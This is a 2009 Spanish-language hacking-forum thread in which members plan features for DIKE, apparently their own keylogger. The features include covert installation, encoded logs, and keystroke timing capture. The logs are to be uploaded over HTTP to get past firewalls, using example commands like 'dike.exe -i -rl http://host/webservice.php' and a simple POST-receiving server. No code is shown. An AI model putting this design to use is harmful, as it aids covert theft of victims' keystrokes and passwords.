.:: Republica Digital de ColombiaUnderground ::.
»
[C]olombia [U]nderground [T]eam
»
Estoy metido en....
»
DIKE
Version 1.0
Username:
1 Hora
1 Día
1 Semana
1 Mes
Siempre
Password:
CUT
Foro
Ayuda
Buscar
Buscar
Busqueda Avanzada
[Cerrar]
Calendario
Ingresar
Registrarse
Páginas: [
1
]
Ir Abajo
« anterior
próximo »
Imprimir
Autor
Tema: Version 1.0 (Leído 594 veces)
0 Usuarios y 1 Visitante están viendo este tema.
Iker
Administrador
Cuasi CuTeano
Desconectado
Mensajes: 125
Version 1.0
«
en:
30 de Julio de 2009, 10:39:28 »
Bueno pos el presidente de por si jode mucho y uno que trabaja ( xDD ) y vive ocupado pos le toca de vez en cuando atenderlo, osease darle cita; asà que echen requerimientos para la versión 1.0 de DIKE.
Salu2.
PD: No se den garra.
Att:
Iker
En línea
http://codeinthehell.blogspot.com
Iker
Administrador
Cuasi CuTeano
Desconectado
Mensajes: 125
Re: Version 1.0
«
Respuesta #1 en:
30 de Julio de 2009, 10:51:13 »
Jo, se me habÃa olvidado poner las que están sugeridas después de la charla de ayer con el flaco.
* Deshabilitar el logueo en Unicode.
* No usar FTP para la subida de logs.
* Realizar la subida de logs mediante HTTP por ser menos firewaliado y no tener que usar credenciales (Un CGI, script vbs, jsp, php, yo que coños se; lo que les venga en gana).
* Codificar el Log ( Codificar = simple = caesar, enigma, corrimiento, xor5, etc...).
* Loguear los tiempos transcurridos entre las teclas presionadas.
* Crear un reproductor del log ( el flaco se ofreció a hacerlo ) ( Dike Log Player xD ).
* Que funque en Seven xD.
* Alternativas a Hook global ( Ideas?... ( Si, puedo volverlo driver pero seria mas escandaloso instalarlo ) ).
Esas son las que hay por el momento asà que opinen cuales van y cuales no.
PD: Con esas caracterÃsticas el tamaño calculado a ojo cerrado y echando mañas seria de 20 Kb.
Salu2.
En línea
http://codeinthehell.blogspot.com
tronador
Administrador
Vago degenerado
Desconectado
Mensajes: 430
Linuxsss
Re: Version 1.0
«
Respuesta #2 en:
30 de Julio de 2009, 11:30:58 »
no se puede dejar el ftp como alternativa o eso sube mucho el peso?
y smtp tampoco se puede agregar como alternativa?
En línea
Iker
Administrador
Cuasi CuTeano
Desconectado
Mensajes: 125
Re: Version 1.0
«
Respuesta #3 en:
30 de Julio de 2009, 11:45:35 »
Sip, pero por ejemplo la mayorÃa de empresas están cerrando SMTP a raÃz de que se presentan ataques de envió de SPAM desde la red interna, asà que solo aceptan protocolos de correo ( SMTP TLS, SMTP SSL ). Igual uds deciden, si dicen que SMTP queda pos queda no problem.
El problema de FTP es que es inseguro y la clave queda quemada, entonces al realizar la subida de los logs es posible que el atacado borre la info en el FTP y se queda sin el pan y sin el queso.
Salu2.
Att:
Iker
En línea
http://codeinthehell.blogspot.com
Alluz
Ministro de Relaciones Exteriores
Administrador
Vago degenerado
Desconectado
Mensajes: 1.505
Ministro de relaciones exteriores
Re: Version 1.0
«
Respuesta #4 en:
30 de Julio de 2009, 12:34:54 »
El otro dÃa instalé dike en una máquina y ni por el carajos encontré el log de donde guardaba las teclas presionadas. No estaba al lado del dike.exe :S
Me gustarÃa que:
1. Si le doy ejecutar, solo se ejecute para el usuario actual y el log se guarde al ladito del ejecutable.
2. Si le doy dike.exe -i, se copie a alguna parte, se instale y guarde el log en algun lado predefinido.
3. Si le doy dike.exe -rl
http://host/webservice.php
haga lo mismo que 1, pero con remote logs por web.
4. Si le doy dike.exe -i -rl
http://host/webservice.php
haga lo mismo que 3, pero con logs por web.
Opcional:
5. Si le doy dike.exe -wd World Domination muajajjajajajaja
En línea
Prefiero trabajar que ponerme con tanto bla, bla, bla.
Prefiero crear, desarrollar, experimentar, que copiar resultados de otro lugar.
Prefiero leer, investigar y sacar mis propios conceptos.
Prefiero que me conozcan por lo que hago y por los topics propios y experimentados, que ser conocido como alguien que solo trae links e informacion que nunca ha probado.
Prefiero ir directo y al grano que escribir 10 paginas para decir lo que se puede decir en 1.
>Prefiero ser consciente de mis propias debilidades y fortalezas, que crear una fama sin argumentos validos.
Iker
Administrador
Cuasi CuTeano
Desconectado
Mensajes: 125
Re: Version 1.0
«
Respuesta #5 en:
30 de Julio de 2009, 02:04:28 »
el 1 ya esta, el 2 ya esta, el 3 es el que propusimos con el flaco; no entiendo el 4; el 5 es facil si le da "dike.exe -wd Word Domination" se inyecta en la memoria de Word y escribe "Dominated success".
Salu2.
Att:
Iker
En línea
http://codeinthehell.blogspot.com
flacman
Administrador
Vago degenerado
Desconectado
Mensajes: 2.897
Trabajar, trabajar y trabajar! . Uribe
Re: Version 1.0
«
Respuesta #6 en:
30 de Julio de 2009, 02:40:52 »
jajaj y 6) q se meta al perfÃl de WOW de la máquina, le robe todos los puntos de experiencia y se los transfiera a su muñeco xD
Pos yo propondrÃa hacerlo con todo lo q se nos ocurra (smtp, ftp, html, etc) y mas bn compilar "version sin ftp" y asÃ... Para el 3 y 4 RPM se encarga de eso (de montarnos el web service).
para lo del hook.... esta noche cojo google a ver si se me ocurre algo xD
En línea
Posted by
Alluz
Ministro de Relaciones Exteriores
Administrador
Vago degenerado
Desconectado
Mensajes: 1.505
Ministro de relaciones exteriores
Re: Version 1.0
«
Respuesta #7 en:
30 de Julio de 2009, 04:20:23 »
Estructura de cosa a enviar:
Variable 1=Tiempo tipo unix
Variable 2= Log Teclas capturadas en formato serializado en codigo propio.
El webserver es una sencilla app que:
1. Recibir variable 1 y 2 por post
2. Utilizar un una funcion como fopen para grabar lo recibido
En línea
Prefiero trabajar que ponerme con tanto bla, bla, bla.
Prefiero crear, desarrollar, experimentar, que copiar resultados de otro lugar.
Prefiero leer, investigar y sacar mis propios conceptos.
Prefiero que me conozcan por lo que hago y por los topics propios y experimentados, que ser conocido como alguien que solo trae links e informacion que nunca ha probado.
Prefiero ir directo y al grano que escribir 10 paginas para decir lo que se puede decir en 1.
>Prefiero ser consciente de mis propias debilidades y fortalezas, que crear una fama sin argumentos validos.
Páginas: [
1
]
Ir Arriba
Imprimir
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
[C]olombia [U]nderground [T]eam
-----------------------------
=> Estoy metido en....
===> CUC(Chat)
===> PhlaketoPakutsi
===> SharpPcap
===> DIKE
===> Scylla
=====> Milestone 2.0
=====> Milestone 1.1
===> Comandos
===> SSHack
=> Laboratorios
===> Labs para principiantes
=> ¡Alerta informativa!
=> ¿Y Cuando nos vemos?
-----------------------------
Underground General
-----------------------------
=> Me quedó grande
=> Hacking administrativo
=> Juaking
=> Comunicación
=> Otros temas relacionados
=> Significado de nuestra existencia
-----------------------------
Forense
-----------------------------
=> Lab Forense
=> Investigación
-----------------------------
Desarrollo
-----------------------------
=> Arquitectura
=> Web y diseño
=> Chando código
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows
=> Mac y.... el resto
-----------------------------
Pq todos amamos al Pisco
-----------------------------
=> Electronica y afines
=> Hardware
-----------------------------
General
-----------------------------
=> Ni en fayerwayer o barrapunto?
-----------------------------
Basura
-----------------------------
=> Idiot Corner.
-----------------------------
Foros poco frecuentados
-----------------------------
=> No me interesa su existencia
===> Multimedia
===> Software
===> Redes
===> About CUT
=====> ircut Channel
===> Sugerencias
===> Diseño
===> Ingenieria Inversa
===> Hacking para novatos.
=> Foros poco frecuentados
===> Cut x Meses
=====> Meses anteriores
===> Linux VS. Windows
===> MAC
===> Wiki
===> Libros y cursos
===> Juegos
===> Seguridad y Privacidad
===> Bugs y Exploits
===> Retos & Wargames
===> Virii
Loading...